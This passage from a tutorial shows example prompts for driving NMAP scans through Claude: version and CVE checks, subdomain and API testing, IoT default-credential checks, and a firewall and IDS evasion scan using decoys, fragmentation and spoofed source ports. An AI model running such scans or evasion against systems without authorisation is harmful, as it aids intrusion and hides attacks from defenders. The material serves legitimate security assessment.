Network segmentation analysis
Risk assessment across an entire network perimeter
Understanding firewall and filtering detection
Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting
Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.
I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:
1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability
Run this aggressively (-T4) as we have permission for intensive testing.
Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings
Also check for common subdomain patterns like api, dev, staging, admin, etc.
What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.
I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable
Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)
Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces
Exercise 5.5: Checking for Known Vulnerabilities and Old Software
Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:
1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
- CVSS score
- Exploit availability
- Exposure (internet-facing vs internal)
5. Check for:
- Outdated TLS/SSL versions
- Deprecated cryptographic algorithms
- Unpatched web frameworks
- Old CMS versions (WordPress, Joomla, Drupal)
- Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations
Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering
Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.
Claude can help you write Lua scripts for NMAP’s scripting engine!
Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.
I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output].
Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team
Claude excels at translating technical scan results into actionable business intelligence.
Part 8: Continuous Monitoring with NMAP and Claude
Set up regular scanning routines and use Claude to track changes:
Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
Conclusion
Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:
Express complex scanning requirements in natural language
Get intelligent interpretation of scan results
Receive contextual security advice
Automate repetitive reconnaissance tasks
Learn security concepts through interactive exploration
Key Takeaways:
Always get permission before scanning any network or system
Start with gentle scans and progressively get more aggressive
Use timing controls to avoid overwhelming targets or triggering alarms
Correlate multiple scans for a complete security picture
Leverage Claude’s knowledge to interpret results and suggest next steps
Document everything for compliance and knowledge sharing
Keep NMAP updated to benefit from the latest scripts and capabilities
The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.
About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.